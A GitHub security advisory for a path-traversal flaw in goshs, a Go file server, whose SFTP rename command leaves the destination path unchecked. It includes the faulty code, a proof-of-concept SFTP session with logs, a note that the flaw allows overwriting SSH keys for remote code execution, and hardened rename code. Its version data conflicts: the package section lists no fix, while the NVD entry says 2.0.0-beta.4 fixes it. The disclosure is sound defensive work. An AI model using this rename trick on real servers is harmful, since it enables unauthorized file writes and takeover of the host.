GHSA-2943-crp8-38xx

Published: 10 Apr 2026
Source: github
GitHub: Reviewed
CVSS3: 7.7

Description

goshs is Missing Write Protection for Parametric Data Values

Summary

The SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP.

Details

Here is the issue:

    // helper.go:155-215
    func cmdFile(root string, r *sftp.Request, ip string, sftpServer *SFTPServer) error {
        fullPath, err := sanitizePath(r.Filepath, root) // Source: SANITIZED
        if err != nil {
            return err
        }
        switch r.Method {
        // ...
        case "Rename":
            err := os.Rename(fullPath, r.Target) // Destination: NOT SANITIZED!

PoC

To exploit, upload a file over SFTP and rename it to a destination given as a full path.

Initially there is no key.txt file in /tmp:

    $ ls key.txt
    ls: key.txt: No such file or directory

Start the SFTP server:

    /tmp/sftp-server $ goshs -sftp -b 'user:user' -d .
    WARNING[2026-04-02 20:00:18] upload-folder mode deactivated due to use of 'sftp' mode
    WARNING[2026-04-02 20:00:18] There is a newer Version (v2.0.0-beta.3) of goshs available. Run --update to update goshs.
    INFO [2026-04-02 20:00:18] Starting SFTP server on port 0.0.0.0:2022
    WARNING[2026-04-02 20:00:18] You are using basic auth without SSL. Your credentials will be transferred in cleartext. Consider using -s, too.
    INFO [2026-04-02 20:00:18] Using basic auth with user 'user' and password 'user'
    INFO [2026-04-02 20:00:18] Download embedded file at: /example.txt?embedded
    INFO [2026-04-02 20:00:18] Serving on interface lo0 bound to 127.0.0.1:8000
    INFO [2026-04-02 20:00:18] Serving on interface en0 bound to 192.168.68.51:8000
    INFO [2026-04-02 20:00:18] Serving HTTP from /tmp/sftp-server

Connect to the SFTP server and upload the file:

    $ sftp -P 2022 user@localhost
    user@localhost's password:
    Connected to localhost.
    sftp> put /Users/user/Downloads/key.txt
    Uploading /Users/user/Downloads/key.txt to /tmp/sftp-server/key.txt
    key.txt 100% 15 40.9KB/s 00:00

The file is stored properly.

goshs log:

INFO [2026-04-02 20:03:31] SFTP: [::1]:61742 - [Put] - "/tmp/sftp-server/key.txt"

Rename command with full path:

sftp> rename key.txt /tmp/key.txt

goshs log:

INFO [2026-04-02 20:04:09] SFTP: [::1]:61742 - [Rename] - "/tmp/sftp-server/key.txt to /tmp/key.txt"

The key file is now in /tmp:

    $ ls key.txt
    key.txt

Impact

This allows file writes and can be used either for RCE by overwriting an SSH key, or by overwriting a configuration file, etc.
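A hardened form of the rename handling shown in Details, as an added example (not code from goshs or from this advisory): `confine` and `safeRename` are hypothetical helpers that apply the same root check to both the source and the destination. It assumes, as in the PoC, that absolute paths name real filesystem locations and relative paths are resolved against the SFTP root.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

var errOutsideRoot = errors.New("path escapes SFTP root")

// confine (hypothetical helper, not goshs's sanitizePath) resolves a client
// path against root and rejects results outside it. The check is lexical:
// symlinks inside root are not resolved.
func confine(root, p string) (string, error) {
	root = filepath.Clean(root)
	full := filepath.Clean(p)
	if !filepath.IsAbs(full) {
		full = filepath.Join(root, full)
	}
	rel, err := filepath.Rel(root, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("%w: %q", errOutsideRoot, p)
	}
	return full, nil
}

// safeRename (hypothetical) confines source AND destination before renaming.
func safeRename(root, src, dst string) error {
	from, err := confine(root, src)
	if err != nil {
		return err
	}
	to, err := confine(root, dst)
	if err != nil {
		return err
	}
	return os.Rename(from, to)
}

func main() { // constructed layout mirroring the PoC: <base>/sftp-server is the root
	base, _ := os.MkdirTemp("", "rename-demo")
	defer os.RemoveAll(base)
	root := filepath.Join(base, "sftp-server")
	os.Mkdir(root, 0o700)
	os.WriteFile(filepath.Join(root, "key.txt"), []byte("constructed"), 0o600)
	fmt.Println(safeRename(root, "key.txt", filepath.Join(base, "key.txt"))) // rejected
	fmt.Println(safeRename(root, "key.txt", "renamed.txt"))                  // <nil>
}
```

A deployment that allows symlinks inside the root would additionally need to resolve the destination's parent directory before the comparison.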

Packages

Name: github.com/patrickhener/goshs
Ecosystem: go
Affected versions: >= 1.0.7, <= 1.1.4
Fixed version: None

EPSS: 0.00025 (percentile: 7%, Low)

CVSS3: 7.7 High

Weaknesses

CWE-1314

Related vulnerabilities

CVSS3: 7.7
nvd
5 days ago

goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability is fixed in 2.0.0-beta.4.
